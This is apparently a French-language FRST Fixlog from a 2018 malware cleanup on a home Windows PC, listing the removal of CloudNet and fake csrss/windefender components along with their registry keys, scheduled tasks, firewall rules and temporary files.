HKCR\CLSID\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e)
"HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet" => non trouvé(e)
"HKCU\SOFTWARE\Chromium" => supprimé(es) avec succès
"HKCU\SOFTWARE\EpicNet Inc." => supprimé(es) avec succès
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\SOFTWARE\EpicNet Inc. => non trouvé(e)
C:\ProgramData\SupportAssist => déplacé(es) avec succès
C:\ProgramData\SWCUTemp => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\EpicNet Inc => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => non trouvé(e)
"HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glary Utilities" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{B3C418F8-922B-4faf-915E-59BC14448CF7} => non trouvé(e)
"HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter" => supprimé(es) avec succès
"HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}" => supprimé(es) avec succès
"HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0} => non trouvé(e)
"HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\Glarysoft MalwareHunter" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0} => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AthBtTray" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AtherosBtStack" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AutumnWater" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\CloudNet" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\FLxHCIm64" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\HP Deskjet 3050A J611 series (NET)" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MSC" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Skype" => supprimé(es) avec succès
"C:\Windows\System32\drivers\WinmonProcessMonitor.sys" => a été déverrouillé
C:\Windows\System32\drivers\WinmonProcessMonitor.sys => déplacé(es) avec succès
C:\ProgramData\Blogger\Blogger.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\Folder\Service.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\cloudnet.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\csrss.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\g5D.tmp.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\gC705.tmp.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\WinmonProcessMonitor.sys => déplacé(es) avec succès
C:\Windows\Installer\18f77.msi => déplacé(es) avec succès
C:\Windows\Installer\1c581e4.msp => déplacé(es) avec succès
C:\Windows\Installer\316307.msp => déplacé(es) avec succès
C:\Windows\Installer\3fde3c.msp => déplacé(es) avec succès
C:\Windows\Installer\cd260c.msp => déplacé(es) avec succès
C:\Windows\Installer\cf5db.msp => déplacé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Services\TCPSvc => non trouvé(e)
"C:\Users\patou\AppData\Local\Temp\csrss\proxy\tor.exe" => non trouvé(e)
"C:\Windows\rss\csrss.exe" => non trouvé(e)
"C:\Windows\System32\Tasks\csrss" => non trouvé(e)
"C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" => non trouvé(e)
"C:\Windows\Temp\gEA11.tmp.exe" => non trouvé(e)
Impossible de déplacer "C:\Windows\windefender.exe" => Planifié pour déplacement au redémarrage.
"C:\Users\patou\AppData\Local\Temp\wup\wupv.exe" => non trouvé(e)
"HKLM\Software\WOW6432Node\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}" => supprimé(es) avec succès
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet" => supprimé(es) avec succès
"C:\Users\patou\AppData\Roaming\EpicNet Inc" => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glary Utilities => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter => non trouvé(e)
HKLM\Software\Wow6432Node\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0} => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\Drive\shellex\ContextMenuHandlers\Glarysoft MalwareHunter => non trouvé(e)
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Shared Tools\MSConfig\startupreg\AutumnWater" => non trouvé(e)
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Shared Tools\MSConfig\startupreg\CloudNet" => non trouvé(e)
"C:\Windows\System32\drivers\WinmonProcessMonitor.sys" => non trouvé(e)
"C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\cloudnet.exe" => non trouvé(e)
"HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules\\{421C7726-58B8-40A1-983B-971B4487B150}" => supprimé(es) avec succès
"HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules\\{A0B09702-C233-4909-9E68-D442F9E01024}" => supprimé(es) avec succès
"HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules\\{9AA2D37C-F863-49A3-A2F2-E99222C76020}" => supprimé(es) avec succès
"HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules\\{7205486D-6178-404B-A2CB-BB4A4963CFF6}" => supprimé(es) avec succès
"C:\Windows\Installer\18f77.msi" => non trouvé(e)
"C:\Windows\Installer\1c581e4.msp" => non trouvé(e)
"C:\Windows\Installer\316307.msp" => non trouvé(e)
"C:\Windows\Installer\3fde3c.msp" => non trouvé(e)
C:\Windows\Installer\c0c16.msp => déplacé(es) avec succès
"C:\Windows\Installer\cd260c.msp" => non trouvé(e)
"C:\Windows\Installer\cf5db.msp" => non trouvé(e)
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => non trouvé(e)
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => non trouvé(e)
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\snxPluginsShell" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{F4B3B0AA-13D1-4a36-BDA2-2055B0F3D5DE} => non trouvé(e)
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F} => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glary Utilities => non trouvé(e)
HKLM\Software\Classes\CLSID\{B3C418F8-922B-4faf-915E-59BC14448CF7} => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{72449F31-D047-4C58-925B-334EFCB1471D}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72449F31-D047-4C58-925B-334EFCB1471D}" => supprimé(es) avec succès
"C:\Windows\System32\Tasks\csrss" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72449F31-D047-4C58-925B-334EFCB1471D} => non trouvé(e)
"C:\Windows\System32\Tasks\csrss" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{735BB0D7-C364-4093-8CEB-5CADB85B296C}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{735BB0D7-C364-4093-8CEB-5CADB85B296C}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{75D278E1-C0D0-450A-B832-21A5DFEF0CC6}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{75D278E1-C0D0-450A-B832-21A5DFEF0CC6}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\SgeepHD => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SgeepHD" => supprimé(es) avec succès
C:\ProgramData\TEMP => ":05E9FFE5" ADS supprimé(es) avec succès
C:\ProgramData\TEMP => ":5D432CE3" ADS supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9E242FAA-39B1-4AF0-87CA-A8A1D2CB1450}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CFEFC8C3-84C6-4E92-8FE2-CF7D734025ED}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D5919E89-E2DE-4E6A-B7D9-097A43262348}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{421C7726-58B8-40A1-983B-971B4487B150}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A0B09702-C233-4909-9E68-D442F9E01024}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0B3B15B8-A375-4D87-BBEB-F65AC94E2C12}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CD247549-C72F-49F2-93E8-EABC28C3E0FD}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9AA2D37C-F863-49A3-A2F2-E99222C76020}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{7205486D-6178-404B-A2CB-BB4A4963CFF6}" => non trouvé(e)
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 13528258 B
Java, Flash, Steam htmlcache => 1654 B
Windows/system/drivers => 1382380 B
Edge => 0 B
Chrome => 21105141 B
Firefox => 388261943 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 796419 B
systemprofile32 => 3425579 B
LocalService => 66228 B
NetworkService => 66228 B
patou => 163715255 B
TEMP => 47521039 B
RecycleBin => 403040 B
EmptyTemp: => 618.6 MB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 04-06-2018 18:27:24)
C:\Windows\windefender.exe => a été déplacé(e) avec succès
C:\Windows\windefender.exe => a été déplacé(e) avec succès
==== Fin de Fixlog 18:27:24 ====